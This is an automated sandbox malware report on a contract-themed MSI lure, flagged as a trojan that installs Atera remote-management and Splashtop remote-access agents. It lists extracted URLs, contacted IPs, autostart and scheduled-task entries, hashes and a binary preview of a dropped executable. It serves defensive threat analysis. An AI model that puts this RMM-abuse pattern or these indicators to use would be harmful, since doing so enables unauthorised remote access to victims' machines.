                                                                                        https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/26.5/AgentPackageProgramManageAteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.11/AgentPackageSystemTools.zipAteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.2/AgentPackageTicketing.zipAteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              https://docs.chocolatey.org/en-us/guides/create/create-custom-package-templatesAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zipAteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  http://my.splashtop.comAgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_outdated.gifAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                      https://community.chocolatey.org/api/v2/package/ant/1.10.14AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://dc.services.visualstudio.com/XAgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC481AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://westeurope-5.in.applicationinsights.azure.com/;LiveEndpoint=https://westeurope.livediagnostiAgentPackageOsUpdates.exe, 00000034.00000000.2661915081.000001FC474F2000.00000002.00000001.01000000.0000002B.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48036000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC481AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.4.exeAgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421787000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421762000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://community.chocolatey.org/packages/autohotkey.portableAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip?Y2EPV0xXBAteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  https://somewhere/bob.exeAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                    https://dc.services.visualstudio.com/pAgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyzippackageAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                        https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zipAteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          https://www.nuget.org/packages/NLog.Web.AspNetCoreAgentPackageMonitoring.exe, 00000025.00000002.2378384520.000001D73B958000.00000002.00000001.01000000.00000023.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpfalse
                                                                                                                            https://docs.chocolatey.org/en-us/create/functions/install-chocolateyshortcutAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                              https://dc.services.visualstudio.com/fAgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpfalse
                                                                                                                                http://www.jrsoftware.org/ishelp/index.php?topic=setupexitcodesAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                  https://rawcdn.githack.com/ajshastri/chocolatey-packages/a698d21b3c63b9ff7e01f442f37cdb7ecf89925a/icAgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    https://community.chocolatey.orgAgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF5C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C3E6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/38.3/AGENTPACKAGEAGENTINFORMATIAteraAgent.exe, 00000010.00000002.2498500115.000002BE8016C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://community.chocolatey.org/api/v2/.AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                          http://somewhere123zzaafasd.invalidAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                            http://api.nuget.orgAgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277E00F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesTAgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpfalse
                                                                                                                                                https://ps.atera.com/aAteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  https://urn.to/r/sds_seeAgentPackageMonitoring.exe, 00000025.00000002.2377234109.000001D73B812000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                                                                                                    http://stexbar.googlecode.com/files/StExBar-1.8.3.msiAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                      https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=06242243-00aa-4c7d-a058-04335f7e2536AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://docs.chocolatey.org/en-us/create/functionsAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                          https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziphAteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://my.splashtop.comAgentPackageSTRemote.exe, 00000023.00000002.3066742035.00000154216D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://agent-api.atera.com/Production/Agent/recurringCoAgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A97BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://docs.chocolatey.org/en-us/information/legal.AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                  https://docs.chocolatey.org/en-us/create/automatic-packagesAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                    https://somewhere/bob-x64.exeAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                      https://gist.github.com/choco-bot/61fb53d591dd9c28aac20a49ea6767e5AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://docs.chocolatey.org/en-us/choco/setup#non-administrative-installAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                          https://docs.chocolatey.org/en-us/features/extensionsAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                            http://www.abit.com.tw/AgentPackageMonitoring.exe, 00000025.00000002.2375208097.000001D73B5B2000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                                                                                                                              https://ch0.co/nexus2apikey).AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                https://ps.pndsn.com/vAteraAgent.exe, 0000001A.00000002.2825307729.0000021B52807000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zipAteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.25%2B9/OpenJDK11U-jdk_x64_AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://agent-api.PAgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://www.w3.oAteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://ant.apache.org/AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://bitbucket.org/jonforums/uru)AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                              https://github.com/chocolatey/chocolatey-coreteampackagesAgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C564000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                                https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyenvironmentvariableAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                                  https://ps.atera.com/agentpackagesmac/Agent.Package.Availability/0.16/Agent.Package.Availability.zipAteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://docs.chocolatey.org/en-us/create/functions/install-chocolateyfileassociationAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                                      https://gist.github.com/choco-bot/3c28608c3d3a428a951334d79c38c4c2AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://github.com/majkinetor/au-packages/commit/bf95d56fe5851ee2e4f6f15f79c1a2877a7950a1AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C564000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                                          https://community.chocolatey.org/packages/pik)AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                                            https://profiler.monitor.azure.com/pAgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://community.chocolatey.org/packages?q=id%3A.extensionAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                                                https://github.com/nlog/NLog/wiki/Configuration-file#variablesAteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://github.com/majkinetor/au/blob/master/README.md).AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://raw.githubusercontent.com/wiki/chocolatey/choco/images/gifs/choco_uninstall.gifAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                                                      https://profiler.monitor.azure.com/lAgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpfalse
                                                                                                                                                                                                                        https://github.com/chocolatey/shimgen/tree/master/shim.AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                                                                                                                                                                          https://ps.atera.com/translations/TicketingTray/AgentPackageTicketing.exe, 00000032.00000002.3068186659.00000277DFBB2000.00000002.00000001.01000000.0000004A.sdmpfalse
                                                                                                                                                                                                                            https://dc.services.visualstudio.com/pcqAgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/37.8/AGENTPACKAGEMONITORING.ZIPAteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.zAteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEPROGRAMMANAGEMENT/26.5/AGENTPACKAGEPROGRAMMANAGEAteraAgent.exe, 0000001A.00000002.2825307729.0000021B52111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://ps.atera.com/agentpackagesneAteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://push.chocolatey.org/AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BD71000.00000004.00000800.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        40.119.152.241
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                                                                                                        52.222.144.9
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                        20.50.88.232
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        104.18.21.76
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        35.71.184.3
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		237MERIT-AS-14USfalse
                                                                                                                                                                                                                                        192.229.221.95
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15133EDGECASTUSfalse
                                                                                                                                                                                                                                        152.199.23.209
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15133EDGECASTUSfalse
                                                                                                                                                                                                                                        13.232.67.198
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                        20.60.197.1
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        108.158.75.46
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                        199.232.210.172
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		54113FASTLYUSfalse
                                                                                                                                                                                                                                        13.227.8.14
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse

                                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1576938
                                                                                                                                                                                                                                        Start date and time:2024-12-17 18:44:07 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 14m 31s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:63
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:Documento_Contrato_Seguro_25105476.msi
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winMSI@103/522@0/12
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 15.4%
                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 68%
                                                                                                                                                                                                                                        • Number of executed functions: 432
                                                                                                                                                                                                                                        • Number of non-executed functions: 1
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .msi

                                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7588 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7596 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7768 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AgentPackageSTRemote.exe, PID 2756 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AteraAgent.exe, PID 3396 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AteraAgent.exe, PID 348 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target AteraAgent.exe, PID 7836 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 4304 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 4320 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 6812 because it is empty
                                                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 7344 because it is empty
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                        • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                                        • VT rate limit hit for: Documento_Contrato_Seguro_25105476.msi

                                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                        12:45:20API Interceptor3x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                                                                        12:45:26API Interceptor2917x Sleep call for process: AteraAgent.exe modified
                                                                                                                                                                                                                                        12:45:49API Interceptor79x Sleep call for process: AgentPackageAgentInformation.exe modified
                                                                                                                                                                                                                                        12:46:00API Interceptor50139x Sleep call for process: AgentPackageSTRemote.exe modified
                                                                                                                                                                                                                                        12:46:04API Interceptor30x Sleep call for process: AgentPackageMonitoring.exe modified
                                                                                                                                                                                                                                        12:46:38API Interceptor48x Sleep call for process: AgentPackageOsUpdates.exe modified
                                                                                                                                                                                                                                        12:46:40API Interceptor279x Sleep call for process: AgentPackageTicketing.exe modified
                                                                                                                                                                                                                                        12:46:43API Interceptor1x Sleep call for process: AgentPackageInternalPoller.exe modified
                                                                                                                                                                                                                                        12:46:46API Interceptor119x Sleep call for process: AgentPackageProgramManagement.exe modified
                                                                                                                                                                                                                                        12:47:04API Interceptor7x Sleep call for process: AgentPackageUpgradeAgent.exe modified
                                                                                                                                                                                                                                        17:46:32Task SchedulerRun new task: Monitoring Recovery path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe s>schedulerrun
                                                                                                                                                                                                                                        17:47:41AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {e883dae5-a63d-4a45-afb9-257f64d5a59b} "C:\ProgramData\Package Cache\{e883dae5-a63d-4a45-afb9-257f64d5a59b}\dotnet-runtime-8.0.11-win-x64.exe" /burn.runonce

                                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        442ad5.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                        442ad6.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
